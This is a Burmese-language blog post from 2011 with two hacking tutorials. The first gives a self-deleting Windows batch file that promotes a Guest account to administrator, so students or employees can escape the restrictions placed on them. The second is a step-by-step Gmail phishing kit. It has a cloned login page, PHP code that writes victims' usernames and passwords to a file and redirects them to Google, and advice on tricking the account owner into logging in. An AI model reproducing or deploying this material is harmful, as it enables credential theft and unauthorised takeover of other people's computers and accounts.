LOAD HTAR PAR

Monday, December 5, 2011

Guest အေကmင္႕ကေန Admin ကုိ hack နည္း



ကၽြန္ေတာ္သူငယ္ခ်င္းေတြအတြက္ အဆင္ေျပမည္႕ နည္းလမ္းေလး တစ္ခုျဖစ္ပါတယ္။ ကြန္ပ်ဴတာကုိ ကၽြန္ေတာ္တုိ႕ ေက်ာင္းေတြ ရုံးေတြ စာသင္ခန္းေတြမွာ user ေတြ တစ္ခုခ်င္ဆီ သတ္မွတ္ျပီး သုံးရပါတယ္။ ဥပမာ Administrator ကုိေတာ႕ ဆရာက သုံးျပီး Guest ကုိေတာ႔ ေက်ာင္းသားကုိ ေပးသုံးတယ္ဆုိပါစုိ႕။ အဲဒီလုိ မိမိက Guest သုံးရတာ ျဖစ္တဲ႕အတြက္ အကန္႕အသန္႕ ရွိပါတယ္။ ဥပမာ internet သုံးခ်င္တာေတာင္ သုံးလုိ႕ မရဘူးျဖစ္ေနပါတယ္။( ေလမရွည္ေတာ႕ဘူး) ဒါေၾကာင္႕ မိမိက Guest သုံးေနရလုိ႕ Administrator လုိ လြတ္လပ္စြာ သုံးခြင္႕မရလုိ႕ စိတ္ညစ္ေနတဲ႕ သူငယ္ခ်င္းမ်ားအတြက္ ေအာက္ပါအတုိင္း bat ဖုိင္တစ္ခု တည္ေဆာက္ျပီး Administrator တစ္ေယာက္ကဲ႕သုိ႕ Guest ကေန အသုံးျပဳလုိ႕ရေအာင္ စမ္းသပ္ၾကည္႕ႏုိင္ပါတယ္။ အဆင္ေျပမွာပါ။ ေနာက္အသုံး၀င္ႏုိင္ေသးတာက Administrator Password ေမ႕သြားရင္လည္ ဒီနည္းနဲ႕ အသုံးျပဳႏုိင္ပါတယ္။ (မွတ္ခ်က္။ ။ Administrator Password ေမ႕ရင္ ျပန္ေဖာ္တဲ႕နည္းကုိ ကၽြန္ေတာ္ တင္ျပခဲ႕ျပီးျဖစ္ပါတယ္။ Windows XP Label မွာ ဖတ္ႏုိင္ပါတယ္။)

1. Start >> Run >> notepad လုိ႕ရုိက္ျပီး Enter ေခါက္လုိက္ပါ။ က်လာတဲ႕ notepad ထဲကုိ ေအာက္က code ေတြကုိ copy လုပ္ျပီးထည္႕လုိက္ပါ။

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

ျပီရင္ Guest2admin.bat လုိ႕ Save လုိက္ပါ.။

2.Guest2admin.bat ဖုိင္ကုိ Double click လုပ္ျပီး ဖြင္႕လုိက္ပါ။ ဒါဆုိရင္ အဆင္ေျပပါျပီး ေနာက္ပုိင္းျဖစ္တာကုိေတာ႕ ကုိယ္တုိင္းစမ္းၾကည္႕ လက္ေတြ႕သိပါမည္။:D
Blog Entry Gmail Fack Login Aug 20, '09 1:17 PM
for everyone
  Gmail Password ကိုဘယ္လိုေဖာက္လဲ လို႕ေမးတဲ့သူငယ္ခ်င္းေတြေတာ့ေက်နပ္ၾကမယ္ထင္တယ္။ Gmail Fack Login လုပ္ၿပီး Password ခိုးတာဟာ Gmail Password ခိုးတဲ့နည္းေပါင္းစံုထဲမွာ အလြယ္ဆံုးပါပဲ။ Fack Login လုပ္ၿပီးခိုးမယ္ဆိုရင္ အရင္ဆံုး PHP ဖြင့္ထားတဲ့ Free Web Hosting တခုမွာအရင္ Sign up လုပ္ပါ။ ၿပီးရင္ Login ဝင္ၿပီး File Manager မွာ  File တခုေဆာက္ပါ။ File Create လုပ္တာၿပီးရင္ ဒီအပိုင္းကိုခဏထားလိုက္အံုး။ Browser မွာ new tab တခုဖြင့္ၿပီး mail.google ကိုေခၚလိုက္ပါ။ လြတ္တဲ့ေနရာမွာ right click ေထာက္ၿပီး 'View Page Source' ကို click လိုက္ရင္ code ေတြပါတဲ့ source page တခုေပၚလာမယ္။ keyboard က Ctrl+A ကိုႏွိပ္ select all လုပ္ၿပီး Ctrl+C ႏွိပ္ၿပီး copy လုပ္လိုက္။ WindowKey+R ကိုႏွိပ္ run ကိုေခၚၿပီး notepad လို႕ရိုက္ထည့္လိုက္ၿပီး enter ေခါက္လိုက္ရင္ notepad ပြင့္လာေရာ။ Ctrl+V ႏွိပ္ၿပီး ခုနက copy လုပ္ထားတဲ့ code ေတြကို paste ခ်လိုက္။ Ctrl+F ကိုႏွိပ္ၿပီး fine ကိုေခၚၿပီး "action" ကိုရွာလိုက္။ action ႏွစ္ခုရွိတယ္။ ႏွစ္ခုလံုးရဲ႕ ေနာက္ကလင့္ခ္ေနရာမွာ login.php လို႕ၿပင္လိုက္။ ဒီလိုၿဖစ္သြားမယ္ action="login.php" ။ ၿပီးရင္ Ctrl+F ကိုထပ္ႏွိပ္ၿပီး "google_transparent.gif " ကိုထပ္ရွာလိုက္ၿပီး https://www.google.com/accounts/google_transparent.gif ကိုအစားထိုးလိုက္။ ဒီလိုၿဖစ္သြားမယ္  _fcksavedurl=https://www.google.com/accounts/google_transparent.gif" _fcksavedurl=" >https://www.google.com/accounts/google_transparent.gif" _fcksavedurl=" >https://www.google.com/accounts/google_transparent.gif" _fcksavedurl=" >https://www.google.com/accounts/google_transparent.gif" ။ ၿပီးရင္ index.php လို႕နာမည္ေပးၿပီး save လုပ္လိုက္။ file type မွာက all file ေနာ္။ ေနာက္ထပ္ notepad တခုဖြင့္ၿပီး ေအာက္က code ေတြကို copy/paste လုပ္လိုက္။ save ရမယ့္နာမည္က login.php ။

$fp = fopen("GmailPasswords.txt", "a");
fwrite($fp, "Username:$_POST[Email]\tPassword:$_POST[Passwd]");
echo
header( 'Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail' ) ;
?>

အခု save လုပ္ထားတဲ့ file ႏွစ္ခုကို ့hosting ေပၚမွာေဆာက္ထားတဲ့  ဖိုင္ထဲကို upload တင္လိုက္။ ခိုးလို႕ရပါၿပီ။ ခိုးခ်င္တဲ့ account ပိုင္ရွင္ကို Fack Link ေပးလိုက္ၿပီး login ဝင္လိုက္တာနဲ႕ username ေရာ password ေရာ Hosting ေပၚက ဖိုင္ထဲမွာ text file နဲ႕ေပၚေနလိမ့္မယ္။ ကဲ မလြယ္ဘူးလား။ ဘာပရိုဂရမ္မွ တတ္စရာမလိုဘူး။ ဘယ္နက္ေလယာ မွမသိလဲရတယ္ :P ။  ခုန sign up လုပ္ၿပီးရင္ free hosting ကေန domain တခုေပးပါတယ္။ ဒီလိုပါ http://YOUR NAME.com ။ fack login linke က ဒီလိုၿဖစ္သြားပါမယ္ http://YOURNAME.com/index.php ။ gtalk ပြားေနရင္းေတာ့ မဖြင့္ခိုင္းနဲ႕ေပါ့ ။ လိမ္ဖြင့္ခိုင္းတာလဲ mail.google ကို redirect ေပးထားလို႕ေနာက္တေခါက္ၿပန္၀င္ရင္ရမွာပါ။ ေတာ္ရံုတန္ရံု လူမသိႏိုင္ပါဘူး။အေပၚကအဆင့္ေတြ လုပ္ရမွာပ်င္းရင္လည္း ေအာက္က zip ဖိုင္ေလးကိုေဒါင္းၿပီး upload တင္လိုက္ေပေတာ့။ ဒီလိုလုပ္လို႕ရမွန္းသိရင္လည္း သတိထားလို႕ရၿပီမလား ။ adress bar မွာ mail.google မဟုတ္ရင္ေယာင္လို႕ေတာင္မဝင္မိေစနဲ႕။ ကဲ ေဝဖန္ေနၾကပုဂၢိဳလ္ၾကီးေတြလည္း လာေရာက္ေ၀ဖန္ၾကပါလို႕။မေကာင္းတာေတြၿဖန္႕ေဝေနပါတယ္ ခင္ဗ်ာ။
index.php.zip

Read more:

No comments:

Post a Comment